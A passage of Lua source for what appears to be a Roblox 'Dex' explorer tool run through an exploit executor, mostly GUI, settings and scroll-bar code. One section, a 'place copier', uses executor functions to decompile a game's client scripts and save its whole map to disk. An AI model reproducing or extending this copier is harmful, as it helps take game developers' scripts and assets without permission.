SideMenu:TweenPosition(UDim2.new(1, -330, 0, 0), "Out", "Quad", 0.5, true) OpenToggleButton:TweenPosition(UDim2.new(1,0,0,0), "Out", "Quad", 0.5, true) switchWindows(CurrentWindow,true) else SideMenu:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Quad", 0.5, true) OpenToggleButton:TweenPosition(UDim2.new(1,-30,0,0), "Out", "Quad", 0.5, true) switchWindows("Nothing c:") end end local Settings = { ClickSelect = false, SelBox = false, ClearProps = false, SelectUngrouped = true, SaveInstanceScripts = true } function ReturnSetting(set) if set == "ClearProps" then return Settings.ClearProps elseif set == "SelectUngrouped" then return Settings.SelectUngrouped end end OpenToggleButton.MouseButton1Up:connect(function() toggleDex(true) end) OpenScriptEditorButton.MouseButton1Up:connect(function() if OpenScriptEditorButton.Active then ScriptEditor.Visible = true end end) CloseToggleButton.MouseButton1Up:connect(function() if CloseToggleButton.Active then toggleDex(false) end end) for i,v in pairs(SlideFrame:GetChildren()) do v.MouseButton1Click:connect(function() switchWindows(v.Name) end) v.MouseEnter:connect(function()v.BackgroundTransparency = 0.5 end) v.MouseLeave:connect(function()if CurrentWindow~=v.Name then v.BackgroundTransparency = 1 end end) end function createSetting(name,interName,defaultOn) local newSetting = SettingTemplate:Clone() newSetting.Position = UDim2.new(0,0,0,#SettingList:GetChildren() * 60) newSetting.SName.Text = name local function toggle(on) if on then newSetting.Change.Bar:TweenPosition(UDim2.new(0,32,0,-2),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.25,true) newSetting.Change.OnBar:TweenSize(UDim2.new(0,34,0,15),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.25,true) newSetting.Status.Text = "On" Settings[interName] = true else newSetting.Change.Bar:TweenPosition(UDim2.new(0,-2,0,-2),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.25,true) newSetting.Change.OnBar:TweenSize(UDim2.new(0,0,0,15),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.25,true) newSetting.Status.Text = "Off" Settings[interName] = false end end newSetting.Change.MouseButton1Click:connect(function() toggle(not Settings[interName]) end) newSetting.Visible = true newSetting.Parent = SettingList if defaultOn then toggle(true) end end createSetting("Click part to select","ClickSelect",false) createSetting("Selection Box","SelBox",false) createSetting("Clear property value on focus","ClearProps",false) createSetting("Select ungrouped models","SelectUngrouped",true) createSetting("SaveInstance decompiles scripts","SaveInstanceScripts",true) local function getSelection() local t = GetSelection:Invoke() if t and #t > 0 then return t[1] else return nil end end Mouse.Button1Down:connect(function() if CurrentWindow == "Explorer" and Settings.ClickSelect then local target = Mouse.Target if target then SetSelection:Invoke({target}) end end end) TotallyNotSelectionChanged.Event:connect(function() if Settings.SelBox then local success,err = pcall(function() local selection = getSelection() SelectionBox.Adornee = selection end) if err then SelectionBox.Adornee = nil end end end) SettingsListener.OnInvoke = ReturnSetting -- Map Copier function createMapSetting(obj,interName,defaultOn) local function toggle(on) if on then obj.Change.Bar:TweenPosition(UDim2.new(0,32,0,-2),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.25,true) obj.Change.OnBar:TweenSize(UDim2.new(0,34,0,15),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.25,true) obj.Status.Text = "On" SaveMapSettings[interName] = true else obj.Change.Bar:TweenPosition(UDim2.new(0,-2,0,-2),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.25,true) obj.Change.OnBar:TweenSize(UDim2.new(0,0,0,15),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.25,true) obj.Status.Text = "Off" SaveMapSettings[interName] = false end end obj.Change.MouseButton1Click:connect(function() toggle(not SaveMapSettings[interName]) end) obj.Visible = true obj.Parent = SaveMapSettingFrame if defaultOn then toggle(true) end end function createCopyWhatSetting(serv) if SaveMapSettings.CopyWhat[serv] then local newSetting = SaveMapCopyTemplate:Clone() newSetting.Position = UDim2.new(0,0,0,#SaveMapCopyList:GetChildren() * 22 + 5) newSetting.Info.Text = serv local function toggle(on) if on then newSetting.Change.enabled.Visible = true SaveMapSettings.CopyWhat[serv] = true else newSetting.Change.enabled.Visible = false SaveMapSettings.CopyWhat[serv] = false end end newSetting.Change.MouseButton1Click:connect(function() toggle(not SaveMapSettings.CopyWhat[serv]) end) newSetting.Visible = true newSetting.Parent = SaveMapCopyList end end createMapSetting(SaveMapSettingFrame.Scripts,"SaveScripts",true) createMapSetting(SaveMapSettingFrame.Terrain,"SaveTerrain",true) createMapSetting(SaveMapSettingFrame.Lighting,"LightingProperties",true) createMapSetting(SaveMapSettingFrame.CameraInstances,"CameraInstances",true) createCopyWhatSetting("Workspace") createCopyWhatSetting("Lighting") createCopyWhatSetting("ReplicatedStorage") createCopyWhatSetting("ReplicatedFirst") createCopyWhatSetting("StarterPack") createCopyWhatSetting("StarterGui") createCopyWhatSetting("StarterPlayer") SaveMapName.Text = tostring(game.PlaceId).."MapCopy" SaveMapButton.MouseButton1Click:connect(function() local copyWhat = {} local copyGroup = Instance.new("Model",game:GetService("ReplicatedStorage")) local copyScripts = SaveMapSettings.SaveScripts local copyTerrain = SaveMapSettings.SaveTerrain local lightingProperties = SaveMapSettings.LightingProperties local cameraInstances = SaveMapSettings.CameraInstances ----------------------------------------------------------------------------------- for i,v in pairs(SaveMapSettings.CopyWhat) do if v then table.insert(copyWhat,i) end end local consoleFunc = printconsole or writeconsole if consoleFunc then consoleFunc("Raspberry Pi's place copier loaded.") consoleFunc("Copying map of game "..tostring(game.PlaceId)..".") end function archivable(root) for i,v in pairs(root:GetChildren()) do if not game:GetService("Players"):GetPlayerFromCharacter(v) then v.Archivable = true archivable(v) end end end function decompileS(root) for i,v in pairs(root:GetChildren()) do pcall(function() if v:IsA("LocalScript") then local isDisabled = v.Disabled v.Disabled = true v.Source = decompile(v) v.Disabled = isDisabled if v.Source == "" then if consoleFunc then consoleFunc("LocalScript "..v.Name.." had a problem decompiling.") end else if consoleFunc then consoleFunc("LocalScript "..v.Name.." decompiled.") end end elseif v:IsA("ModuleScript") then v.Source = decompile(v) if v.Source == "" then if consoleFunc then consoleFunc("ModuleScript "..v.Name.." had a problem decompiling.") end else if consoleFunc then consoleFunc("ModuleScript "..v.Name.." decompiled.") end end end end) decompileS(v) end end for i,v in pairs(copyWhat) do archivable(game[v]) end for j,obj in pairs(copyWhat) do if obj ~= "StarterPlayer" then local newFolder = Instance.new("Folder",copyGroup) newFolder.Name = obj for i,v in pairs(game[obj]:GetChildren()) do if v ~= copyGroup then pcall(function() v:Clone().Parent = newFolder end) end end else local newFolder = Instance.new("Model",copyGroup) newFolder.Name = "StarterPlayer" for i,v in pairs(game[obj]:GetChildren()) do local newObj = Instance.new("Folder",newFolder) newObj.Name = v.Name for _,c in pairs(v:GetChildren()) do if c.Name ~= "ControlScript" and c.Name ~= "CameraScript" then c:Clone().Parent = newObj end end end end end if game:GetService("Workspace").CurrentCamera and cameraInstances then local cameraFolder = Instance.new("Model",copyGroup) cameraFolder.Name = "CameraItems" for i,v in pairs(game:GetService("Workspace").CurrentCamera:GetChildren()) do v:Clone().Parent = cameraFolder end end if copyTerrain then local myTerrain = game:GetService("Workspace").Terrain:CopyRegion(game:GetService("Workspace").Terrain.MaxExtents) myTerrain.Parent = copyGroup end function saveProp(obj,prop,par) local myProp = obj[prop] if type(myProp) == "boolean" then local newProp = Instance.new("BoolValue",par) newProp.Name = prop newProp.Value = myProp elseif type(myProp) == "number" then local newProp = Instance.new("IntValue",par) newProp.Name = prop newProp.Value = myProp elseif type(myProp) == "string" then local newProp = Instance.new("StringValue",par) newProp.Name = prop newProp.Value = myProp elseif type(myProp) == "userdata" then -- Assume Color3 pcall(function() local newProp = Instance.new("Color3Value",par) newProp.Name = prop newProp.Value = myProp end) end end if lightingProperties then local lightingProps = Instance.new("Model",copyGroup) lightingProps.Name = "LightingProperties" saveProp(game.Lighting,"Ambient",lightingProps) saveProp(game.Lighting,"Brightness",lightingProps) saveProp(game.Lighting,"ColorShift_Bottom",lightingProps) saveProp(game.Lighting,"ColorShift_Top",lightingProps) saveProp(game.Lighting,"GlobalShadows",lightingProps) saveProp(game.Lighting,"OutdoorAmbient",lightingProps) saveProp(game.Lighting,"Outlines",lightingProps) saveProp(game.Lighting,"GeographicLatitude",lightingProps) saveProp(game.Lighting,"TimeOfDay",lightingProps) saveProp(game.Lighting,"FogColor",lightingProps) saveProp(game.Lighting,"FogEnd",lightingProps) saveProp(game.Lighting,"FogStart",lightingProps) end if decompile and copyScripts then decompileS(copyGroup) end if SaveInstance then SaveInstance(copyGroup,SaveMapName.Text..".rbxm") elseif saveinstance then saveinstance(getelysianpath()..SaveMapName.Text..".rbxm",copyGroup) end --print("Saved!") if consoleFunc then consoleFunc("The map has been copied.") end SaveMapButton.Text = "The map has been saved" wait(5) SaveMapButton.Text = "Save" end) -- End Copier wait() IntroFrame:TweenPosition(UDim2.new(1,-300,0,0),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.5,true) switchWindows("Explorer") wait(1) SideMenu.Visible = true for i = 0,1,0.1 do IntroFrame.BackgroundTransparency = i IntroFrame.Main.BackgroundTransparency = i IntroFrame.Slant.ImageTransparency = i IntroFrame.Title.TextTransparency = i IntroFrame.Version.TextTransparency = i IntroFrame.Creator.TextTransparency = i wait() end IntroFrame.Visible = false SlideFrame:TweenPosition(UDim2.new(0,0,0,0),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.5,true) OpenScriptEditorButton:TweenPosition(UDim2.new(0,0,0,180),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.5,true) CloseToggleButton:TweenPosition(UDim2.new(0,0,0,210),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.5,true) Slant:TweenPosition(UDim2.new(0,0,0,240),Enum.EasingDirection.Out,Enum.EasingStyle.Quart,0.5,true) wait(0.5) for i = 1,0,-0.1 do OpenScriptEditorButton.Icon.ImageTransparency = i CloseToggleButton.TextTransparency = i wait() end CloseToggleButton.Active = true CloseToggleButton.AutoButtonColor = true OpenScriptEditorButton.Active = true OpenScriptEditorButton.AutoButtonColor = true end) spawn(function() -- initial states local Option = { -- can modify object parents in the hierarchy Modifiable = false; -- can select objects Selectable = true; } -- MERELY Option.Modifiable = true -- END MERELY -- general size of GUI objects, in pixels local GUI_SIZE = 16 -- padding between items within each entry local ENTRY_PADDING = 1 -- padding between each entry local ENTRY_MARGIN = 1 local Input = game:GetService("UserInputService") local HoldingCtrl = false local HoldingShift = false --[[ # Explorer Panel A GUI panel that displays the game hierarchy. ## Selection Bindables - `Function GetSelection ( )` Returns an array of objects representing the objects currently selected in the panel. - `Function SetSelection ( Objects selection )` Sets the objects that are selected in the panel. `selection` is an array of objects. - `Event SelectionChanged ( )` Fired after the selection changes. ## Option Bindables - `Function GetOption ( string optionName )` If `optionName` is given, returns the value of that option. Otherwise, returns a table of options and their current values. - `Function SetOption ( string optionName, bool value )` Sets `optionName` to `value`. Options: - Modifiable Whether objects can be modified by the panel. Note that modifying objects depends on being able to select them. If Selectable is false, then Actions will not be available. Reparenting is still possible, but only for the dragged object. - Selectable Whether objects can be selected. If Modifiable is false, then left-clicking will perform a drag selection. ## Updates - 2013-09-18 - Fixed explorer icons to match studio explorer. - 2013-09-14 - Added GetOption and SetOption bindables. - Option: Modifiable; sets whether objects can be modified by the panel. - Option: Selectable; sets whether objects can be selected. - Slight modification to left-click selection behavior. - Improved layout and scaling. - 2013-09-13 - Added drag to reparent objects. - Left-click to select/deselect object. - Left-click and drag unselected object to reparent single object. - Left-click and drag selected object to move reparent entire selection. - Right-click while dragging to cancel. - 2013-09-11 - Added explorer panel header with actions. - Added Cut action. - Added Copy action. - Added Paste action. - Added Delete action. - Added drag selection. - Left-click: Add to selection on drag. - Right-click: Add to or remove from selection on drag. - Ensured SelectionChanged fires only when the selection actually changes. - Added documentation and change log. - Fixed thread issue. - 2013-09-09 - Added basic multi-selection. - Left-click to set selection. - Right-click to add to or remove from selection. - Removed "Selection" ObjectValue. - Added GetSelection BindableFunction. - Added SetSelection BindableFunction. - Added SelectionChanged BindableEvent. - Changed font to SourceSans. - 2013-08-31 - Improved GUI sizing based off of `GUI_SIZE` constant. - Automatic font size detection. - 2013-08-27 - Initial explorer panel. ## Todo - Sorting - by ExplorerOrder - by children - by name - Drag objects to reparent ]] local ENTRY_SIZE = GUI_SIZE + ENTRY_PADDING*2 local ENTRY_BOUND = ENTRY_SIZE + ENTRY_MARGIN local HEADER_SIZE = ENTRY_SIZE*2 local FONT = 'SourceSans' local FONT_SIZE do local size = {8,9,10,11,12,14,18,24,36,48} local s local n = math.huge for i = 1,#size do if size[i] <= GUI_SIZE then FONT_SIZE = i - 1 end end end local GuiColor = { Background = Color3.new(233/255, 233/255, 233/255); Border = Color3.new(149/255, 149/255, 149/255); Selected = Color3.new( 96/255, 140/255, 211/255); BorderSelected = Color3.new( 86/255, 125/255, 188/255); Text = Color3.new( 0/255, 0/255, 0/255); TextDisabled = Color3.new(128/255, 128/255, 128/255); TextSelected = Color3.new(255/255, 255/255, 255/255); Button = Color3.new(221/255, 221/255, 221/255); ButtonBorder = Color3.new(149/255, 149/255, 149/255); ButtonSelected = Color3.new(255/255, 0/255, 0/255); Field = Color3.new(255/255, 255/255, 255/255); FieldBorder = Color3.new(191/255, 191/255, 191/255); TitleBackground = Color3.new(178/255, 178/255, 178/255); } ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---- Icon map constants local MAP_ID = 483448923 -- Indices based on implementation of Icon function. local ACTION_CUT = 160 local ACTION_COPY = 161 local ACTION_PASTE = 162 local ACTION_DELETE = 163 local ACTION_SORT = 164 local ACTION_CUT_OVER = 174 local ACTION_COPY_OVER = 175 local ACTION_PASTE_OVER = 176 local ACTION_DELETE_OVER = 177 local ACTION_SORT_OVER = 178 local ACTION_EDITQUICKACCESS = 190 local ACTION_FREEZE = 188 local ACTION_STARRED = 189 local ACTION_ADDSTAR = 184 local ACTION_ADDSTAR_OVER = 187 local NODE_COLLAPSED = 165 local NODE_EXPANDED = 166 local NODE_COLLAPSED_OVER = 179 local NODE_EXPANDED_OVER = 180 local ExplorerIndex = { ["Accessory"] = 32; ["Accoutrement"] = 32; ["AdService"] = 73; ["Animation"] = 60; ["AnimationController"] = 60; ["AnimationTrack"] = 60; ["Animator"] = 60; ["ArcHandles"] = 56; ["AssetService"] = 72; ["Attachment"] = 34; ["Backpack"] = 20; ["BadgeService"] = 75; ["BallSocketConstraint"] = 89; ["BillboardGui"] = 64; ["BinaryStringValue"] = 4; ["BindableEvent"] = 67; ["BindableFunction"] = 66; ["BlockMesh"] = 8; ["BloomEffect"] = 90; ["BlurEffect"] = 90; ["BodyAngularVelocity"] = 14; ["BodyForce"] = 14; ["BodyGyro"] = 14; ["BodyPosition"] = 14; ["BodyThrust"] = 14; ["BodyVelocity"] = 14; ["BoolValue"] = 4; ["BoxHandleAdornment"] = 54; ["BrickColorValue"] = 4; ["Camera"] = 5; ["CFrameValue"] = 4; ["CharacterMesh"] = 60; ["Chat"] = 33; ["ClickDetector"] = 41; ["CollectionService"] = 30; ["Color3Value"] = 4; ["ColorCorrectionEffect"] = 90; ["ConeHandleAdornment"] = 54; ["Configuration"] = 58; ["ContentProvider"] = 72; ["ContextActionService"] = 41; ["CoreGui"] = 46; ["CoreScript"] = 18; ["CornerWedgePart"] = 1; ["CustomEvent"] = 4; ["CustomEventReceiver"] = 4; ["CylinderHandleAdornment"] = 54; ["CylinderMesh"] = 8; ["CylindricalConstraint"] = 89; ["Debris"] = 30; ["Decal"] = 7; ["Dialog"] = 62; ["DialogChoice"] = 63; ["DoubleConstrainedValue"] = 4; ["Explosion"] = 36; ["FileMesh"] = 8; ["Fire"] = 61; ["Flag"] = 38; ["FlagStand"] = 39; ["FloorWire"] = 4; ["Folder"] = 70; ["ForceField"] = 37; ["Frame"] = 48; ["GamePassService"] = 19; ["Glue"] = 34; ["GuiButton"] = 52; ["GuiMain"] = 47; ["GuiService"] = 47; ["Handles"] = 53; ["HapticService"] = 84; ["Hat"] = 45; ["HingeConstraint"] = 89; ["Hint"] = 33; ["HopperBin"] = 22; ["HttpService"] = 76; ["Humanoid"] = 9; ["ImageButton"] = 52; ["ImageLabel"] = 49; ["InsertService"] = 72; ["IntConstrainedValue"] = 4; ["IntValue"] = 4; ["JointInstance"] = 34; ["JointsService"] = 34; ["Keyframe"] = 60; ["KeyframeSequence"] = 60; ["KeyframeSequenceProvider"] = 60; ["Lighting"] = 13; ["LineHandleAdornment"] = 54; ["LocalScript"] = 18; ["LogService"] = 87; ["MarketplaceService"] = 46; ["Message"] = 33; ["Model"] = 2; ["ModuleScript"] = 71; ["Motor"] = 34; ["Motor6D"] = 34; ["MoveToConstraint"] = 89; ["NegateOperation"] = 78; ["NetworkClient"] = 16; ["NetworkReplicator"] = 29; ["NetworkServer"] = 15; ["NumberValue"] = 4; ["ObjectValue"] = 4; ["Pants"] = 44; ["ParallelRampPart"] = 1; ["Part"] = 1; ["ParticleEmitter"] = 69; ["PartPairLasso"] = 57; ["PathfindingService"] = 37; ["Platform"] = 35; ["Player"] = 12; ["PlayerGui"] = 46; ["Players"] = 21; ["PlayerScripts"] = 82; ["PointLight"] = 13; ["PointsService"] = 83; ["Pose"] = 60; ["PrismaticConstraint"] = 89; ["PrismPart"] = 1; ["PyramidPart"] = 1; ["RayValue"] = 4; ["ReflectionMetadata"] = 86; ["ReflectionMetadataCallbacks"] = 86; ["ReflectionMetadataClass"] = 86; ["ReflectionMetadataClasses"] = 86; ["ReflectionMetadataEnum"] = 86; ["ReflectionMetadataEnumItem"] = 86; ["ReflectionMetadataEnums"] = 86; ["ReflectionMetadataEvents"] = 86; ["ReflectionMetadataFunctions"] = 86; ["ReflectionMetadataMember"] = 86; ["ReflectionMetadataProperties"] = 86; ["ReflectionMetadataYieldFunctions"] = 86; ["RemoteEvent"] = 80; ["RemoteFunction"] = 79; ["ReplicatedFirst"] = 72; ["ReplicatedStorage"] = 72; ["RightAngleRampPart"] = 1; ["RocketPropulsion"] = 14; ["RodConstraint"] = 89; ["RopeConstraint"] = 89; ["Rotate"] = 34; ["RotateP"] = 34; ["RotateV"] = 34; ["RunService"] = 66; ["ScreenGui"] = 47; ["Script"] = 6; ["ScrollingFrame"] = 48; ["Seat"] = 35; ["Selection"] = 55; ["SelectionBox"] = 54; ["SelectionPartLasso"] = 57; ["SelectionPointLasso"] = 57; ["SelectionSphere"] = 54; ["ServerScriptService"] = 0; ["ServerStorage"] = 74; ["Shirt"] = 43; ["ShirtGraphic"] = 40; ["SkateboardPlatform"] = 35; ["Sky"] = 28; ["SlidingBallConstraint"] = 89; ["Smoke"] = 59; ["Snap"] = 34; ["Sound"] = 11; ["SoundService"] = 31; ["Sparkles"] = 42; ["SpawnLocation"] = 25; ["SpecialMesh"] = 8; ["SphereHandleAdornment"] = 54; ["SpotLight"] = 13; ["SpringConstraint"] = 89; ["StarterCharacterScripts"] = 82; ["StarterGear"] = 20; ["StarterGui"] = 46; ["StarterPack"] = 20; ["StarterPlayer"] = 88; ["StarterPlayerScripts"] = 82; ["Status"] = 2; ["StringValue"] = 4; ["SunRaysEffect"] = 90; ["SurfaceGui"] = 64; ["SurfaceLight"] = 13; ["SurfaceSelection"] = 55; ["Team"] = 24; ["Teams"] = 23; ["TeleportService"] = 81; ["Terrain"] = 65; ["TerrainRegion"] = 65; ["TestService"] = 68; ["TextBox"] = 51; ["TextButton"] = 51; ["TextLabel"] = 50; ["Texture"] = 10; ["TextureTrail"] = 4; ["Tool"] = 17; ["TouchTransmitter"] = 37; ["TrussPart"] = 1; ["UnionOperation"] = 77; ["UserInputService"] = 84; ["Vector3Value"] = 4; ["VehicleSeat"] = 35; ["VelocityMotor"] = 34; ["WedgePart"] = 1; ["Weld"] = 34; ["Workspace"] = 19; } ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- function Create(ty,data) local obj if type(ty) == 'string' then obj = Instance.new(ty) else obj = ty end for k, v in pairs(data) do if type(k) == 'number' then v.Parent = obj else obj[k] = v end end return obj end local barActive = false local activeOptions = {} function createDDown(dBut, callback,...) if barActive then for i,v in pairs(activeOptions) do v:Destroy() end activeOptions = {} barActive = false return else barActive = true end local slots = {...} local base = dBut for i,v in pairs(slots) do local newOption = base:Clone() newOption.ZIndex = 5 newOption.Name = "Option "..tostring(i) newOption.Parent = base.Parent.Parent.Parent newOption.BackgroundTransparency = 0 newOption.ZIndex = 2 table.insert(activeOptions,newOption) newOption.Position = UDim2.new(-0.4, dBut.Position.X.Offset, dBut.Position.Y.Scale, dBut.Position.Y.Offset + (#activeOptions * dBut.Size.Y.Offset)) newOption.Text = slots[i] newOption.MouseButton1Down:connect(function() dBut.Text = slots[i] callback(slots[i]) for i,v in pairs(activeOptions) do v:Destroy() end activeOptions = {} barActive = false end) end end -- Connects a function to an event such that it fires asynchronously function Connect(event,func) return event:connect(function(...) local a = {...} spawn(function() func(unpack(a)) end) end) end -- returns the ascendant ScreenGui of an object function GetScreen(screen) if screen == nil then return nil end while not screen:IsA("ScreenGui") do screen = screen.Parent if screen == nil then return nil end end return screen end do local ZIndexLock = {} -- Sets the ZIndex of an object and its descendants. Objects are locked so -- that SetZIndexOnChanged doesn't spawn multiple threads that set the -- ZIndex of the same object. function SetZIndex(object,z) if not ZIndexLock[object] then ZIndexLock[object] = true if object:IsA'GuiObject' then object.ZIndex = z end local children = object:GetChildren() for i = 1,#children do SetZIndex(children[i],z) end ZIndexLock[object] = nil end end function SetZIndexOnChanged(object) return object.Changed:connect(function(p) if p == "ZIndex" then SetZIndex(object,object.ZIndex) end end) end end ---- IconMap ---- -- Image size: 256px x 256px -- Icon size: 16px x 16px -- Padding between each icon: 2px -- Padding around image edge: 1px -- Total icons: 14 x 14 (196) local Icon do local iconMap = 'http://www.roblox.com/asset/?id=' .. MAP_ID game:GetService('ContentProvider'):Preload(iconMap) local iconDehash do -- 14 x 14, 0-based input, 0-based output local f=math.floor function iconDehash(h) return f(h/14%14),f(h%14) end end function Icon(IconFrame,index) local row,col = iconDehash(index) local mapSize = Vector2.new(256,256) local pad,border = 2,1 local iconSize = 16 local class = 'Frame' if type(IconFrame) == 'string' then class = IconFrame IconFrame = nil end if not IconFrame then IconFrame = Create(class,{ Name = "Icon"; BackgroundTransparency = 1; ClipsDescendants = true; Create('ImageLabel',{ Name = "IconMap"; Active = false; BackgroundTransparency = 1; Image = iconMap; Size = UDim2.new(mapSize.x/iconSize,0,mapSize.y/iconSize,0); }); }) end IconFrame.IconMap.Position = UDim2.new(-col - (pad*(col+1) + border)/iconSize,0,-row - (pad*(row+1) + border)/iconSize,0) return IconFrame end end ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---- ScrollBar do -- AutoButtonColor doesn't always reset properly local function ResetButtonColor(button) local active = button.Active button.Active = not active button.Active = active end local function ArrowGraphic(size,dir,scaled,template) local Frame = Create('Frame',{ Name = "Arrow Graphic"; BorderSizePixel = 0; Size = UDim2.new(0,size,0,size); Transparency = 1; }) if not template then template = Instance.new("Frame") template.BorderSizePixel = 0 end local transform if dir == nil or dir == 'Up' then function transform(p,s) return p,s end elseif dir == 'Down' then function transform(p,s) return UDim2.new(0,p.X.Offset,0,size-p.Y.Offset-1),s end elseif dir == 'Left' then function transform(p,s) return UDim2.new(0,p.Y.Offset,0,p.X.Offset),UDim2.new(0,s.Y.Offset,0,s.X.Offset) end elseif dir == 'Right' then function transform(p,s) return UDim2.new(0,size-p.Y.Offset-1,0,p.X.Offset),UDim2.new(0,s.Y.Offset,0,s.X.Offset) end end local scale if scaled then function scale(p,s) return UDim2.new(p.X.Offset/size,0,p.Y.Offset/size,0),UDim2.new(s.X.Offset/size,0,s.Y.Offset/size,0) end else function scale(p,s) return p,s end end local o = math.floor(size/4) if size%2 == 0 then local n = size/2-1 for i = 0,n do local t = template:Clone() local p,s = scale(transform( UDim2.new(0,n-i,0,o+i), UDim2.new(0,(i+1)*2,0,1) )) t.Position = p t.Size = s t.Parent = Frame end else local n = (size-1)/2 for i = 0,n do local t = template:Clone() local p,s = scale(transform( UDim2.new(0,n-i,0,o+i), UDim2.new(0,i*2+1,0,1) )) t.Position = p t.Size = s t.Parent = Frame end end if size%4 > 1 then local t = template:Clone() local p,s = scale(transform( UDim2.new(0,0,0,size-o-1), UDim2.new(0,size,0,1) )) t.Position = p t.Size = s t.Parent = Frame end return Frame end local function GripGraphic(size,dir,spacing,scaled,template) local Frame = Create('Frame',{ Name = "Grip Graphic"; BorderSizePixel = 0; Size = UDim2.new(0,size.x,0,size.y); Transparency = 1; }) if not template then template = Instance.new("Frame") template.BorderSizePixel = 0 end spacing = spacing or 2 local scale if scaled then function scale(p) return UDim2.new(p.X.Offset/size.x,0,p.Y.Offset/size.y,0) end else function scale(p) return p end end if dir == 'Vertical' then for i=0,size.x-1,spacing do local t = template:Clone() t.Size = scale(UDim2.new(0,1,0,size.y)) t.Position = scale(UDim2.new(0,i,0,0)) t.Parent = Frame end elseif dir == nil or dir == 'Horizontal' then for i=0,size.y-1,spacing do local t = template:Clone() t.Size = scale(UDim2.new(0,size.x,0,1)) t.Position = scale(UDim2.new(0,0,0,i)) t.Parent = Frame end end return Frame end local mt = { __index = { GetScrollPercent = function(self) return self.ScrollIndex/(self.TotalSpace-self.VisibleSpace) end; CanScrollDown = function(self) return self.ScrollIndex + self.VisibleSpace < self.TotalSpace end; CanScrollUp = function(self) return self.ScrollIndex > 0 end; ScrollDown = function(self) self.ScrollIndex = self.ScrollIndex + self.PageIncrement self:Update() end; ScrollUp = function(self) self.ScrollIndex = self.ScrollIndex - self.PageIncrement self:Update() end; ScrollTo = function(self,index) self.ScrollIndex = index self:Update() end; SetScrollPercent = function(self,percent) self.ScrollIndex = math.floor((self.TotalSpace - self.VisibleSpace)*percent + 0.5) self:Update() end; }; } mt.__index.CanScrollRight = mt.__index.CanScrollDown mt.__index.CanScrollLeft = mt.__index.CanScrollUp mt.__index.ScrollLeft = mt.__index.ScrollUp mt.__index.ScrollRight = mt.__index.ScrollDown function ScrollBar(horizontal) -- create row scroll bar local ScrollFrame = Create('Frame',{ Name = "ScrollFrame"; Position = horizontal and UDim2.new(0,0,1,-GUI_SIZE) or UDim2.new(1,-GUI_SIZE,0,0); Size = horizontal and UDim2.new(1,0,0,GUI_SIZE) or UDim2.new(0,GUI_SIZE,1,0); BackgroundTransparency = 1; Create('ImageButton',{ Name = "ScrollDown"; Position = horizontal and UDim2.new(1,-GUI_SIZE,0,0) or UDim2.new(0,0,1,-GUI_SIZE); Size = UDim2.new(0, GUI_SIZE, 0, GUI_SIZE); BackgroundColor3 = GuiColor.Button; BorderColor3 = GuiColor.Border; --BorderSizePixel = 0; }); Create('ImageButton',{ Name = "ScrollUp"; Size = UDim2.new(0, GUI_SIZE, 0, GUI_SIZE); BackgroundColor3 = GuiColor.Button; BorderColor3 = GuiColor.Border; --BorderSizePixel = 0; }); Create('ImageButton',{ Name = "ScrollBar"; Size = horizontal and UDim2.new(1,-GUI_SIZE*2,1,0) or UDim2.new(1,0,1,-GUI_SIZE*2); Position = horizontal and UDim2.new(0,GUI_SIZE,0,0) or UDim2.new(0,0,0,GUI_SIZE); AutoButtonColor = false; BackgroundColor3 = Color3.new(0.94902, 0.94902, 0.94902); BorderColor3 = GuiColor.Border; --BorderSizePixel = 0; Create('ImageButton',{ Name = "ScrollThumb"; AutoButtonColor = false; Size = UDim2.new(0, GUI_SIZE, 0, GUI_SIZE); BackgroundColor3 = GuiColor.Button; BorderColor3 = GuiColor.Border; --BorderSizePixel = 0; }); }); }) local graphicTemplate = Create('Frame',{ Name="Graphic"; BorderSizePixel = 0; BackgroundColor3 = GuiColor.Border; }) local graphicSize = GUI_SIZE/2 local ScrollDownFrame = ScrollFrame.ScrollDown local ScrollDownGraphic = ArrowGraphic(graphicSize,horizontal and 'Right' or 'Down',true,graphicTemplate) ScrollDownGraphic.Position = UDim2.new(0.5,-graphicSize/2,0.5,-graphicSize/2) ScrollDownGraphic.Parent = ScrollDownFrame local ScrollUpFrame = ScrollFrame.ScrollUp local ScrollUpGraphic = ArrowGraphic(graphicSize,horizontal and 'Left' or 'Up',true,graphicTemplate) ScrollUpGraphic.Position = UDim2.new(0.5,-graphicSize/2,0.5,-graphicSize/2) ScrollUpGraphic.Parent = ScrollUpFrame local ScrollBarFrame = ScrollFrame.ScrollBar local ScrollThumbFrame = ScrollBarFrame.ScrollThumb do local size = GUI_SIZE*3/8 local Decal = GripGraphic(Vector2.new(size,size),horizontal and 'Vertical' or 'Horizontal',2,graphicTemplate) Decal.Position = UDim2.new(0.5,-size/2,0.5,-size/2) Decal.Parent = ScrollThumbFrame end local Class = setmetatable({ GUI = ScrollFrame; ScrollIndex = 0; VisibleSpace = 0; TotalSpace = 0; PageIncrement = 1; },mt) local UpdateScrollThumb if horizontal then function UpdateScrollThumb() ScrollThumbFrame.Size = UDim2.new(Class.VisibleSpace/Class.TotalSpace,0,0,GUI_SIZE) if ScrollThumbFrame.AbsoluteSize.x < GUI_SIZE then ScrollThumbFrame.Size = UDim2.new(0,GUI_SIZE,0,GUI_SIZE) end local barSize = ScrollBarFrame.AbsoluteSize.x ScrollThumbFrame.Position = UDim2.new(Class:GetScrollPercent()*(barSize - ScrollThumbFrame.AbsoluteSize.x)/barSize,0,0,0) end else function UpdateScrollThumb() ScrollThumbFrame.Size = UDim2.new(0,GUI_SIZE,Class.VisibleSpace/Class.TotalSpace,0) if ScrollThumbFrame.AbsoluteSize.y < GUI_SIZE then ScrollThumbFrame.Size = 